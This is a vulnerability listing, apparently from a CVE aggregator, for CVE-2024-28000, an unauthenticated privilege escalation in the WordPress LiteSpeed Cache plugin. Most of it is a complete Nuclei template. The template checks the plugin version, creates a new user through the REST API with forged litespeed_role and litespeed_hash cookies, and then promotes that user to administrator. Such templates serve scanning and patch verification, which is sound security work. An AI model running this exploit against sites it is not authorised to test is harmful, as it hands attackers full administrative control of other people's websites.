漏洞描述
Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.
CVE-2024-28000: WordPress LiteSpeed Cache - Unauthenticated Privilege Escalation to Admin
PoC代码[已公开]
id: CVE-2024-28000
info:
name: WordPress LiteSpeed Cache - Unauthenticated Privilege Escalation to Admin
author: melmathari
severity: critical
description: |
Incorrect Privilege Assignment vulnerability in LiteSpeed Technologies LiteSpeed Cache litespeed-cache allows Privilege Escalation.This issue affects LiteSpeed Cache: from 1.9 through 6.3.0.1.
remediation: Fixed in 6.4.
reference:
- https://patchstack.com/database/vulnerability/litespeed-cache/wordpress-litespeed-cache-plugin-6-3-0-1-unauthenticated-privilege-escalation-vulnerability?_s_id=cve
- https://www.exploit-db.com/exploits/52328
- https://nvd.nist.gov/vuln/detail/CVE-2024-28000
- https://vulncheck.com/xdb/6f169f41e032
- https://blog.securelayer7.net/cve-2024-28000-litespeed-cache-plugin/
classification:
cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
cvss-score: 9.8
cve-id: CVE-2024-28000
cwe-id: CWE-266,NVD-CWE-Other
epss-score: 0.82458
epss-percentile: 0.99188
cpe: cpe:2.3:a:litespeedtech:litespeed_cache:*:*:*:*:*:wordpress:*:*
metadata:
verified: true
max-request: 2
vendor: litespeedtech
product: litespeed_cache
framework: wordpress
publicwww-query: "/wp-content/plugins/litespeed-cache/"
tags: cve,cve2024,wordpress,wp,wp-plugin,litespeed-cache,priv-esc,intrusive,vkev
flow: http(1) || (http(2) && http(3))
variables:
username: "{{to_lower(rand_text_alpha(5))}}"
password: "{{rand_text_alphanumeric(12)}}!"
email: "{{rand_base(8)}}@{{rand_base(5)}}.com"
http:
- raw:
- |
GET /wp-content/plugins/litespeed-cache/readme.txt HTTP/1.1
Host: {{Hostname}}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(body, 'LiteSpeed Cache')
- compare_versions(version, '<= 6.3.0.1')
condition: and
extractors:
- type: regex
part: body
group: 1
name: version
regex:
- 'Stable tag: ([0-9.]+)'
- raw:
- |
POST /wp-json/wp/v2/users HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}
{
"username": "{{username}}",
"password": "{{password}}",
"email": "{{email}}"
}
# The litespeed_hash input was required to escalate privileges to users
matchers:
- type: dsl
dsl:
- status_code == 201
- contains(content_type, "application/json")
- contains_all(body, "first_name","username")
condition: and
internal: true
extractors:
- type: json
name: user_id
json:
- ".id"
internal: true
- raw:
- |
PUT /wp-json/wp/v2/users/{{user_id}} HTTP/1.1
Host: {{Hostname}}
Content-Type: application/json
Cookie: litespeed_role=1; litespeed_hash={{litespeed_hash}}
{
"roles": ["administrator"]
}
matchers:
- type: dsl
dsl:
- status_code == 200
- contains(content_type, "application/json")
- contains_all(body, "administrator","registered_date")
condition: and
# digest: 4b0a0048304602210091db2f28037cecf1026b0a873373087518a2a46d5e0ca642d85dd114f9eeea6c022100d0ca031a451cd44c37c69076dcdf31f00920d52e90cb446cabdc1df9ae555150:922c64590222798bb761d5b6d8e72950